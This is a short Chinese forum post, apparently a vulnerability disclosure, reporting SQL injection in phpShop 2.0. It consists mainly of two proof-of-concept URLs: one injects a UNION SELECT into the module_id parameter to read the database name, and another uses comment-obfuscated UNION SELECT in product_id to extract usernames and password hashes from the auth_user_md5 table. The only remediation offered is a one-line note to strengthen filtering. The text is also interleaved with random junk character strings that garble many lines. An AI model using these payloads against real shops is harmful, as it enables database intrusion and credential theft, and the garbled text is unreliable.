标题 : phpshop 2.0 SQL Injection Vulnerability) X: l0 _$ I4 `* ?9 z' F
! x2 P) X3 [- P% s# {作者 : By onestree
7 [9 A- d9 m& x; O. a% X" R下载地址 : http://code.google.com/p/phpshop/downloads/list* \0 J( S. i+ f5 r# P8 ]
测试地址: windows 7 / ubuntu8 X) f7 ~' P- U" f: R! V! _: [
4 }9 q6 d0 {4 [4 X" a
& q5 h0 l. U1 @" q2 }8 }. E+ @) TSQLi p0c:5 p$ F7 q- Q* T; N$ ]
3 S: l3 \( Z1 `& T3 b==================
% b1 |9 F/ p) M" }. `! ~4 i+ {
$ o% J6 D7 v7 Chttp://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'1 @3 D% P/ U8 t( t( E6 W
union select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --
% `) A# W- P6 m! s4 d- j# ^6 u
! s! q' p4 r5 f% v' a+ Lhttp://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--. z0 W G8 b& l9 [7 p! v, v
N% w; f9 r3 _/ k$ q8 H
修复:' e A9 n+ q s7 Q9 B% e9 E
加强过滤; H8 @; U+ `( ^/ B7 `
" M5 g; b. d0 r$ c
# @& ^" X" K3 }$ t' j+ w
|
发表于 2013-1-18 18:24:10
收藏
支持
反对